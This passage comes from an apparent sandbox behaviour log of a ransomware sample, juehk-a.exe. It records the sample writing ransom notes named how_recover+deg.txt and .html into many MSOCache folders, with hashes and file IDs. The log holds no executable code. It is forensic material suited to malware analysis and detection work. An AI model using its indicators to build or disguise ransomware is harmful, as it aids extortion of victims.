8757.            pid: 1648
8758.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8759.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8760.            ads:
8761.          fid (ads:): 562949953521059
8762.          ntstatus: 0x0
8763.          CreateOptions: 0x0
8764.        file:
8765.          timestamp: 52131
8766.          mode: created
8767.          sequenceNumber: 654
8768.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.fr\how_recover+deg.html
8769.          processinfo:
8770.            pid: 1648
8771.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8772.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8773.            ads:
8774.          fid (ads:): 562949953521060
8775.          ntstatus: 0x0
8776.          CreateOptions: 0x60
8777.        file:
8778.          timestamp: 52138
8779.          mode: close
8780.          sequenceNumber: 655
8781.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.fr\how_recover+deg.html
8782.          filesize: 9480
8783.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8784.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8785.          processinfo:
8786.            pid: 1648
8787.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8788.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8789.            ads:
8790.          fid (ads:): 562949953521060
8791.          ntstatus: 0x0
8792.          CreateOptions: 0x0
8793.        file:
8794.          timestamp: 52143
8795.          mode: created
8796.          sequenceNumber: 656
8797.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8798.          processinfo:
8799.            pid: 1648
8800.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8801.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8802.            ads:
8803.          fid (ads:): 562949953521061
8804.          ntstatus: 0x0
8805.          CreateOptions: 0x60
8806.        file:
8807.          timestamp: 52149
8808.          mode: close
8809.          sequenceNumber: 657
8810.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8811.          filesize: 2673
8812.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8813.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8814.          processinfo:
8815.            pid: 1648
8816.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8817.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8818.            ads:
8819.          fid (ads:): 562949953521061
8820.          ntstatus: 0x0
8821.          CreateOptions: 0x0
8822.        file:
8823.          timestamp: 52155
8824.          mode: created
8825.          sequenceNumber: 658
8826.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8827.          processinfo:
8828.            pid: 1648
8829.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8830.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8831.            ads:
8832.          fid (ads:): 562949953521062
8833.          ntstatus: 0x0
8834.          CreateOptions: 0x60
8835.        file:
8836.          timestamp: 52160
8837.          mode: close
8838.          sequenceNumber: 659
8839.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8840.          filesize: 9480
8841.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8842.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8843.          processinfo:
8844.            pid: 1648
8845.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8846.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8847.            ads:
8848.          fid (ads:): 562949953521062
8849.          ntstatus: 0x0
8850.          CreateOptions: 0x0
8851.        file:
8852.          timestamp: 52186
8853.          mode: created
8854.          sequenceNumber: 660
8855.          value: C:\MSOCache\All Users\{90150000-0044-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8856.          processinfo:
8857.            pid: 1648
8858.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8859.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8860.            ads:
8861.          fid (ads:): 562949953521063
8862.          ntstatus: 0x0
8863.          CreateOptions: 0x60
8864.        file:
8865.          timestamp: 52191
8866.          mode: close
8867.          sequenceNumber: 661
8868.          value: C:\MSOCache\All Users\{90150000-0044-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8869.          filesize: 2673
8870.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8871.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8872.          processinfo:
8873.            pid: 1648
8874.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8875.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8876.            ads:
8877.          fid (ads:): 562949953521063
8878.          ntstatus: 0x0
8879.          CreateOptions: 0x0
8880.        file:
8881.          timestamp: 52200
8882.          mode: created
8883.          sequenceNumber: 662
8884.          value: C:\MSOCache\All Users\{90150000-0044-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8885.          processinfo:
8886.            pid: 1648
8887.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8888.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8889.            ads:
8890.          fid (ads:): 562949953521064
8891.          ntstatus: 0x0
8892.          CreateOptions: 0x60
8893.        file:
8894.          timestamp: 52206
8895.          mode: close
8896.          sequenceNumber: 663
8897.          value: C:\MSOCache\All Users\{90150000-0044-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8898.          filesize: 9480
8899.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8900.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8901.          processinfo:
8902.            pid: 1648
8903.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8904.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8905.            ads:
8906.          fid (ads:): 562949953521064
8907.          ntstatus: 0x0
8908.          CreateOptions: 0x0
8909.        file:
8910.          timestamp: 52291
8911.          mode: created
8912.          sequenceNumber: 664
8913.          value: C:\MSOCache\All Users\{90150000-0090-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8914.          processinfo:
8915.            pid: 1648
8916.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8917.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8918.            ads:
8919.          fid (ads:): 562949953521065
8920.          ntstatus: 0x0
8921.          CreateOptions: 0x60
8922.        file:
8923.          timestamp: 52302
8924.          mode: close
8925.          sequenceNumber: 665
8926.          value: C:\MSOCache\All Users\{90150000-0090-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8927.          filesize: 2673
8928.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8929.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8930.          processinfo:
8931.            pid: 1648
8932.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8933.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8934.            ads:
8935.          fid (ads:): 562949953521065
8936.          ntstatus: 0x0
8937.          CreateOptions: 0x0
8938.        file:
8939.          timestamp: 52308
8940.          mode: created
8941.          sequenceNumber: 666
8942.          value: C:\MSOCache\All Users\{90150000-0090-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8943.          processinfo:
8944.            pid: 1648
8945.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8946.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8947.            ads:
8948.          fid (ads:): 562949953521066
8949.          ntstatus: 0x0
8950.          CreateOptions: 0x60
8951.        file:
8952.          timestamp: 52314
8953.          mode: close
8954.          sequenceNumber: 667
8955.          value: C:\MSOCache\All Users\{90150000-0090-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8956.          filesize: 9480
8957.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8958.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8959.          processinfo:
8960.            pid: 1648
8961.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8962.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8963.            ads:
8964.          fid (ads:): 562949953521066
8965.          ntstatus: 0x0
8966.          CreateOptions: 0x0
8967.        file:
8968.          timestamp: 52606
8969.          mode: created
8970.          sequenceNumber: 668
8971.          value: C:\MSOCache\All Users\{90150000-00A1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8972.          processinfo:
8973.            pid: 1648
8974.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8975.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8976.            ads:
8977.          fid (ads:): 562949953521067
8978.          ntstatus: 0x0
8979.          CreateOptions: 0x60
8980.        file:
8981.          timestamp: 52614
8982.          mode: close
8983.          sequenceNumber: 669
8984.          value: C:\MSOCache\All Users\{90150000-00A1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8985.          filesize: 2673
8986.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8987.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8988.          processinfo:
8989.            pid: 1648
8990.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8991.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8992.            ads:
8993.          fid (ads:): 562949953521067
8994.          ntstatus: 0x0
8995.          CreateOptions: 0x0
8996.        file:
8997.          timestamp: 52842
8998.          mode: created
8999.          sequenceNumber: 670
9000.          value: C:\MSOCache\All Users\{90150000-00A1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9001.          processinfo:
9002.            pid: 1648
9003.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9004.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9005.            ads:
9006.          fid (ads:): 562949953521068
9007.          ntstatus: 0x0
9008.          CreateOptions: 0x60
9009.        file:
9010.          timestamp: 52849
9011.          mode: close
9012.          sequenceNumber: 671
9013.          value: C:\MSOCache\All Users\{90150000-00A1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9014.          filesize: 9480
9015.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9016.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9017.          processinfo:
9018.            pid: 1648
9019.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9020.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9021.            ads:
9022.          fid (ads:): 562949953521068
9023.          ntstatus: 0x0
9024.          CreateOptions: 0x0
9025.        file:
9026.          timestamp: 52933
9027.          mode: created
9028.          sequenceNumber: 672
9029.          value: C:\MSOCache\All Users\{90150000-00BA-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9030.          processinfo:
9031.            pid: 1648
9032.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9033.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9034.            ads:
9035.          fid (ads:): 562949953521069
9036.          ntstatus: 0x0
9037.          CreateOptions: 0x60
9038.        file:
9039.          timestamp: 52943
9040.          mode: close
9041.          sequenceNumber: 673
9042.          value: C:\MSOCache\All Users\{90150000-00BA-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9043.          filesize: 2673
9044.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9045.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9046.          processinfo:
9047.            pid: 1648
9048.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9049.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9050.            ads:
9051.          fid (ads:): 562949953521069
9052.          ntstatus: 0x0
9053.          CreateOptions: 0x0
9054.        file:
9055.          timestamp: 52950
9056.          mode: created
9057.          sequenceNumber: 674
9058.          value: C:\MSOCache\All Users\{90150000-00BA-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9059.          processinfo:
9060.            pid: 1648
9061.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9062.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9063.            ads:
9064.          fid (ads:): 844424930231726
9065.          ntstatus: 0x0
9066.          CreateOptions: 0x60
9067.        file:
9068.          timestamp: 52954
9069.          mode: close
9070.          sequenceNumber: 675
9071.          value: C:\MSOCache\All Users\{90150000-00BA-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9072.          filesize: 9480
9073.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9074.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9075.          processinfo:
9076.            pid: 1648
9077.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9078.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9079.            ads:
9080.          fid (ads:): 844424930231726
9081.          ntstatus: 0x0
9082.          CreateOptions: 0x0
9083.        file:
9084.          timestamp: 53028
9085.          mode: created
9086.          sequenceNumber: 676
9087.          value: C:\MSOCache\All Users\{90150000-00C1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9088.          processinfo:
9089.            pid: 1648
9090.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9091.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9092.            ads:
9093.          fid (ads:): 844424930231727
9094.          ntstatus: 0x0
9095.          CreateOptions: 0x60
9096.        file:
9097.          timestamp: 53037
9098.          mode: close
9099.          sequenceNumber: 677
9100.          value: C:\MSOCache\All Users\{90150000-00C1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9101.          filesize: 2673
9102.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9103.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9104.          processinfo:
9105.            pid: 1648
9106.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9107.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9108.            ads:
9109.          fid (ads:): 844424930231727
9110.          ntstatus: 0x0
9111.          CreateOptions: 0x0
9112.        file:
9113.          timestamp: 53102
9114.          mode: created
9115.          sequenceNumber: 678
9116.          value: C:\MSOCache\All Users\{90150000-00C1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9117.          processinfo:
9118.            pid: 1648
9119.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9120.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9121.            ads:
9122.          fid (ads:): 562949953521072
9123.          ntstatus: 0x0
9124.          CreateOptions: 0x60
9125.        file:
9126.          timestamp: 53109
9127.          mode: close
9128.          sequenceNumber: 679
9129.          value: C:\MSOCache\All Users\{90150000-00C1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9130.          filesize: 9480
9131.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9132.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9133.          processinfo:
9134.            pid: 1648
9135.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9136.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9137.            ads:
9138.          fid (ads:): 562949953521072
9139.          ntstatus: 0x0
9140.          CreateOptions: 0x0
9141.        file:
9142.          timestamp: 53518
9143.          mode: created
9144.          sequenceNumber: 680
9145.          value: C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9146.          processinfo:
9147.            pid: 1648
9148.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9149.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9150.            ads:
9151.          fid (ads:): 562949953521073
9152.          ntstatus: 0x0
9153.          CreateOptions: 0x60
9154.        file:
9155.          timestamp: 53525
9156.          mode: close
9157.          sequenceNumber: 681
9158.          value: C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9159.          filesize: 2673
9160.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9161.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9162.          processinfo:
9163.            pid: 1648
9164.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9165.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9166.            ads:
9167.          fid (ads:): 562949953521073
9168.          ntstatus: 0x0
9169.          CreateOptions: 0x0
9170.        file:
9171.          timestamp: 53532
9172.          mode: created
9173.          sequenceNumber: 682
9174.          value: C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9175.          processinfo:
9176.            pid: 1648
9177.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9178.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9179.            ads:
9180.          fid (ads:): 562949953521074
9181.          ntstatus: 0x0
9182.          CreateOptions: 0x60
9183.        file:
9184.          timestamp: 53537
9185.          mode: close
9186.          sequenceNumber: 683
9187.          value: C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9188.          filesize: 9480
9189.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9190.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9191.          processinfo:
9192.            pid: 1648
9193.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9194.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9195.            ads:
9196.          fid (ads:): 562949953521074
9197.          ntstatus: 0x0
9198.          CreateOptions: 0x0
9199.        file:
9200.          timestamp: 53605
9201.          mode: created
9202.          sequenceNumber: 684
9203.          value: C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9204.          processinfo:
9205.            pid: 1648
9206.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9207.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9208.            ads:
9209.          fid (ads:): 562949953521075
9210.          ntstatus: 0x0
9211.          CreateOptions: 0x60
9212.        file:
9213.          timestamp: 53611
9214.          mode: close
9215.          sequenceNumber: 685
9216.          value: C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9217.          filesize: 2673
9218.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9219.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9220.          processinfo:
9221.            pid: 1648
9222.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9223.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9224.            ads:
9225.          fid (ads:): 562949953521075
9226.          ntstatus: 0x0
9227.          CreateOptions: 0x0
9228.        file:
9229.          timestamp: 53678
9230.          mode: created
9231.          sequenceNumber: 686
9232.          value: C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9233.          processinfo:
9234.            pid: 1648
9235.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9236.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9237.            ads:
9238.          fid (ads:): 562949953521076
9239.          ntstatus: 0x0
9240.          CreateOptions: 0x60
9241.        file:
9242.          timestamp: 53685
9243.          mode: close
9244.          sequenceNumber: 687
9245.          value: C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9246.          filesize: 9480
9247.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9248.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9249.          processinfo:
9250.            pid: 1648
9251.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9252.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9253.            ads:
9254.          fid (ads:): 562949953521076
9255.          ntstatus: 0x0
9256.          CreateOptions: 0x0
9257.        file:
9258.          timestamp: 53696
9259.          mode: created
9260.          sequenceNumber: 688
9261.          value: C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9262.          processinfo:
9263.            pid: 1648
9264.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9265.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9266.            ads:
9267.          fid (ads:): 844424930231733
9268.          ntstatus: 0x0
9269.          CreateOptions: 0x60
9270.        file:
9271.          timestamp: 53702
9272.          mode: close
9273.          sequenceNumber: 689
9274.          value: C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9275.          filesize: 2673
9276.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9277.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9278.          processinfo:
9279.            pid: 1648
9280.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9281.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9282.            ads:
9283.          fid (ads:): 844424930231733
9284.          ntstatus: 0x0
9285.          CreateOptions: 0x0
9286.        file:
9287.          timestamp: 53708
9288.          mode: created
9289.          sequenceNumber: 690
9290.          value: C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9291.          processinfo:
9292.            pid: 1648
9293.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9294.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9295.            ads:
9296.          fid (ads:): 1125899906942390
9297.          ntstatus: 0x0
9298.          CreateOptions: 0x60
9299.        file:
9300.          timestamp: 53714
9301.          mode: close
9302.          sequenceNumber: 691
9303.          value: C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9304.          filesize: 9480
9305.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9306.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9307.          processinfo:
9308.            pid: 1648
9309.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9310.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9311.            ads:
9312.          fid (ads:): 1125899906942390
9313.          ntstatus: 0x0
9314.          CreateOptions: 0x0
9315.        file:
9316.          timestamp: 53780
9317.          mode: created
9318.          sequenceNumber: 692
9319.          value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+deg.txt
9320.          processinfo:
9321.            pid: 1648
9322.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9323.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9324.            ads:
9325.          fid (ads:): 562949953521079
9326.          ntstatus: 0x0
9327.          CreateOptions: 0x60
9328.        file:
9329.          timestamp: 53790
9330.          mode: close
9331.          sequenceNumber: 693
9332.          value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+deg.txt
9333.          filesize: 2673
9334.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9335.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9336.          processinfo:
9337.            pid: 1648
9338.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9339.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9340.            ads:
9341.          fid (ads:): 562949953521079
9342.          ntstatus: 0x0
9343.          CreateOptions: 0x0
9344.        file:
9345.          timestamp: 53799
9346.          mode: created
9347.          sequenceNumber: 694
9348.          value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+deg.html
9349.          processinfo:
9350.            pid: 1648
9351.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9352.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9353.            ads:
9354.          fid (ads:): 562949953521080
9355.          ntstatus: 0x0
9356.          CreateOptions: 0x60
9357.        file:
9358.          timestamp: 53807
9359.          mode: close
9360.          sequenceNumber: 695
9361.          value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+deg.html
9362.          filesize: 9480
9363.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9364.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9365.          processinfo:
9366.            pid: 1648
9367.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9368.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9369.            ads:
9370.          fid (ads:): 562949953521080
9371.          ntstatus: 0x0
9372.          CreateOptions: 0x0
9373.        file:
9374.          timestamp: 53814
9375.          mode: created
9376.          sequenceNumber: 696
9377.          value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9378.          processinfo:
9379.            pid: 1648
9380.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9381.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9382.            ads:
9383.          fid (ads:): 562949953521081
9384.          ntstatus: 0x0
9385.          CreateOptions: 0x60
9386.        file:
9387.          timestamp: 53822
9388.          mode: close
9389.          sequenceNumber: 697
9390.          value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9391.          filesize: 2673
9392.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9393.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9394.          processinfo:
9395.            pid: 1648
9396.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9397.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9398.            ads:
9399.          fid (ads:): 562949953521081
9400.          ntstatus: 0x0
9401.          CreateOptions: 0x0
9402.        file:
9403.          timestamp: 53829
9404.          mode: created
9405.          sequenceNumber: 698
9406.          value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9407.          processinfo:
9408.            pid: 1648
9409.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9410.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9411.            ads:
9412.          fid (ads:): 562949953521082
9413.          ntstatus: 0x0
9414.          CreateOptions: 0x60
9415.        file:
9416.          timestamp: 53835
9417.          mode: close
9418.          sequenceNumber: 699
9419.          value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9420.          filesize: 9480
9421.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9422.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9423.          processinfo:
9424.            pid: 1648
9425.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9426.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9427.            ads:
9428.          fid (ads:): 562949953521082
9429.          ntstatus: 0x0
9430.          CreateOptions: 0x0
9431.        file:
9432.          timestamp: 53866
9433.          mode: created
9434.          sequenceNumber: 700
9435.          value: C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9436.          processinfo:
9437.            pid: 1648
9438.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9439.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9440.            ads:
9441.          fid (ads:): 562949953521083
9442.          ntstatus: 0x0
9443.          CreateOptions: 0x60
9444.        file:
9445.          timestamp: 53873
9446.          mode: close
9447.          sequenceNumber: 701
9448.          value: C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
9449.          filesize: 2673
9450.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
9451.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
9452.          processinfo:
9453.            pid: 1648
9454.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9456.            ads:
9457.          fid (ads:): 562949953521083
9458.          ntstatus: 0x0
9459.          CreateOptions: 0x0
9460.        file:
9461.          timestamp: 53878
9462.          mode: created
9463.          sequenceNumber: 702
9464.          value: C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9465.          processinfo:
9466.            pid: 1648
9467.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9468.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9469.            ads:
9470.          fid (ads:): 562949953521084
9471.          ntstatus: 0x0
9472.          CreateOptions: 0x60
9473.        file:
9474.          timestamp: 53884
9475.          mode: close
9476.          sequenceNumber: 703
9477.          value: C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+deg.html
9478.          filesize: 9480
9479.          md5sum: a68c3caf0be8f1a393c697136926cfd4
9480.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
9481.          processinfo:
9482.            pid: 1648
9483.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9484.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9485.            ads:
9486.          fid (ads:): 562949953521084
9487.          ntstatus: 0x0
9488.          CreateOptions: 0x0
9489.        file:
9490.          timestamp: 53892
9491.          mode: created
9492.          sequenceNumber: 704
9493.          value: C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+deg.txt
9494.          processinfo:
9495.            pid: 1648
9496.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
9497.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
9498.            ads:
9499.          fid (ads:): 562949953521085
